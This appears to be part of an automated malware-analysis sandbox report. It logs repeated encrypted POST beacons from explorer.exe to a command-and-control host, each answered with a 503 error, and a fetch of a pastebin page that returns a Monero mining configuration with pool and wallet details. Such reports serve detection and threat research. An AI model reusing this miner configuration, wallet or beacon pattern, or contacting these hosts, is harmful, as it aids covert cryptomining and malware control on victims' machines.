Nov 10, 2023 15:38:30.959048033 CET	287	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 34 9b dd 2b Data Ascii: 9}6F>1.lo}k\wu$f]d4+Avo%XFYK)Q ~n3]\|k)$!o\H+5(47/F0#'G..x9-X9LnNv*F:W#ELg\87qR\|jRF>h$LoP5
Nov 10, 2023 15:38:31.267112017 CET	287	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.6	49757	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:31.588249922 CET	287	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://liedn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: host-host-file8.com
Nov 10, 2023 15:38:31.588287115 CET	288	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 1d dd aa 01 Data Ascii: 9}6F>1.lo}k\wu$f]d){z3B(\""zfJb!)B1e
Nov 10, 2023 15:38:31.886995077 CET	288	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.6	49758	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:32.199776888 CET	289	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ldxhifgucj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: host-host-file8.com
Nov 10, 2023 15:38:32.199815035 CET	290	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 38 91 a2 17 Data Ascii: 9}6F>1.lo}k\wu$f]d8Way,[GA+4WN%C?aVjWR~G`J_uwy"(G1[ d N~!7{$d%\|P/o,OTezy!-/:=>t_v[,
Nov 10, 2023 15:38:32.507610083 CET	290	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.6	49760	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:32.824908018 CET	296	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pemamjvcpk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: host-host-file8.com
Nov 10, 2023 15:38:32.824937105 CET	297	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 35 cb c9 03 Data Ascii: 9}6F>1.lo}k\wu$f]d57js@T:E=wTHLiPY~(~)1HuK=l<s`/($6NNK\`6cGt?[YD&%4H5@4 n!YqNSts*
Nov 10, 2023 15:38:33.124291897 CET	297	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.6	49761	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:33.440500021 CET	298	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qcgvlxft.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 155 Host: host-host-file8.com
Nov 10, 2023 15:38:33.440540075 CET	298	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 22 80 9f 0a Data Ascii: 9}6F>1.lo}k\wu$f]d",m8e40n5//v!MS ,0k&*hb+M/yL~
Nov 10, 2023 15:38:33.741771936 CET	299	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.6	49762	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:34.055603981 CET	299	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ogmthh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: host-host-file8.com
Nov 10, 2023 15:38:34.055639982 CET	299	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 56 82 c3 70 Data Ascii: 9}6F>1.lo}k\wu$f]dVpHeoV)GXG:BFG^h\zg0/K9:Sj_7z\|
Nov 10, 2023 15:38:34.354845047 CET	300	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.6	49763	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:34.671171904 CET	300	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nlijd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 207 Host: host-host-file8.com
Nov 10, 2023 15:38:34.671205997 CET	301	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 2c c4 ae 09 Data Ascii: 9}6F>1.lo}k\wu$f]d,$?9vYeRH?/cD9s,uYfY.:9]"/pzT;V</Z)NK?vO6{3&_f>Q0ny=p.Q
Nov 10, 2023 15:38:34.970344067 CET	301	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.6	49764	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:35.296973944 CET	302	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nugxs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: host-host-file8.com
Nov 10, 2023 15:38:35.297002077 CET	302	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 0d 89 ac 61 Data Ascii: 9}6F>1.lo}k\wu$f]daVgAOQ^Fws4!6&a@O?1l3l5s#](Q,( lR@)#!$S.D-rv\|;#
Nov 10, 2023 15:38:35.594405890 CET	302	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49727	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:45.795119047 CET	239	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kegnkcpidq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: host-host-file8.com
Nov 10, 2023 15:36:45.795156002 CET	240	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 07 de a8 0f Data Ascii: 9}6F>1.lo}k\wu$f]dE?b^O=P$JE:rMm4H.M=[+,eZ:{5%[w]}3oq:iXsK\|8-06acD"{V9gs~b+qe<@WC
Nov 10, 2023 15:36:46.094574928 CET	240	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.6	49765	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:38:35.911516905 CET	303	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fotbgladl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: host-host-file8.com
Nov 10, 2023 15:38:35.911550045 CET	303	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 40 c2 92 23 Data Ascii: 9}6F>1.lo}k\wu$f]d@#+Miq?ud<([/Hog\"2UlUT}-I!.0\|
Nov 10, 2023 15:38:36.219624996 CET	303	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49728	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:46.439987898 CET	241	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bxqfgpms.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: host-host-file8.com
Nov 10, 2023 15:36:46.440033913 CET	241	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2e dd ca 24 Data Ascii: 9}6F>1.lo}k\wu$f]d.$=~CC9VHliwa11^&.\|5a_9cOf'(="1q1QEd;#+72NhwQ}4y4t;?.
Nov 10, 2023 15:36:46.736902952 CET	241	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49729	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:47.129914999 CET	242	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jgdfwhycbb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: host-host-file8.com
Nov 10, 2023 15:36:47.129966021 CET	242	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 19 8a a7 26 Data Ascii: 9}6F>1.lo}k\wu$f]d&3oRgaoU_"vLVwyb{BJSN-lEcm6F(;THM;p`<)1t>a^#\|ZWuV7v8hL4Y
Nov 10, 2023 15:36:47.429282904 CET	243	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49730	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:47.796094894 CET	243	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dqxfcxtqc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: host-host-file8.com
Nov 10, 2023 15:36:47.796139956 CET	244	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d 83 87 79 Data Ascii: 9}6F>1.lo}k\wu$f]dyKsq*YT8I=&EJs%Ny(&S5ry_&/z'6w+VA1iZB]7SzpIn]v/2C#Te7M\]<[q\aB@W
Nov 10, 2023 15:36:48.097372055 CET	244	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49731	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:48.470799923 CET	245	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sxcdcfkj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: host-host-file8.com
Nov 10, 2023 15:36:48.470834970 CET	245	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 d8 b6 2d Data Ascii: 9}6F>1.lo}k\wu$f]d@-@+TULh_8]+KJ6'bwMkMGdM.wPv65bd99)v?*n~tJv7~+T f{\|lB1x<ImzD0
Nov 10, 2023 15:36:48.768601894 CET	245	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49732	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:49.338114023 CET	246	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jlmfcqwlhw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: host-host-file8.com
Nov 10, 2023 15:36:49.338149071 CET	246	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 38 a2 b3 2c Data Ascii: 9}6F>1.lo}k\wu$f]d8,C.zP9d^b6\lzX<ulQ`NW"[K
Nov 10, 2023 15:36:49.638225079 CET	247	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49719	172.67.34.170	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-10 14:35:59 UTC	0	OUT	GET /raw/cZ2J3Upi HTTP/1.1 Accept: / Connection: close Host: pastebin.com User-Agent: cpp-httplib/0.9
2023-11-10 14:35:59 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 10 Nov 2023 14:35:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Fri, 10 Nov 2023 13:54:58 GMT Server: cloudflare CF-RAY: 823f067088bfeb67-SEA
2023-11-10 14:35:59 UTC	0	IN	Data Raw: 37 35 36 0d 0a 7b 0d 0a 09 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 09 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 09 22 70 6f 72 74 22 3a 20 31 34 34 33 33 2c 0d 0a 09 22 77 61 6c 6c 65 74 22 3a 20 22 34 37 7a 33 66 71 57 33 77 4c 50 57 4a 34 41 43 46 65 74 4c 52 46 54 50 41 4b 57 57 71 77 70 37 66 68 46 37 67 64 61 56 44 57 66 48 59 43 69 55 52 75 61 38 69 41 72 34 6d 78 62 44 48 33 61 59 56 32 41 61 71 53 54 69 67 72 70 44 6e 4b 56 39 45 4d 35 4a 6a 67 73 34 54 4b 31 46 6e 51 71 2e 6c 61 74 65 73 74 2f 70 61 73 73 77 6f 72 64 22 2c 0d 0a 09 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 09 22 72 69 67 2d 69 64 22 3a 20 22 22 2c 0d 0a 09 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 66 61 6c Data Ascii: 756{"algo": "rx/0","pool": "xmr-eu1.nanopool.org","port": 14433,"wallet": "47z3fqW3wLPWJ4ACFetLRFTPAKWWqwp7fhF7gdaVDWfHYCiURua8iAr4mxbDH3aYV2AaqSTigrpDnKV9EM5Jjgs4TK1FnQq.latest/password","password": "","rig-id": "","keepalive": fal
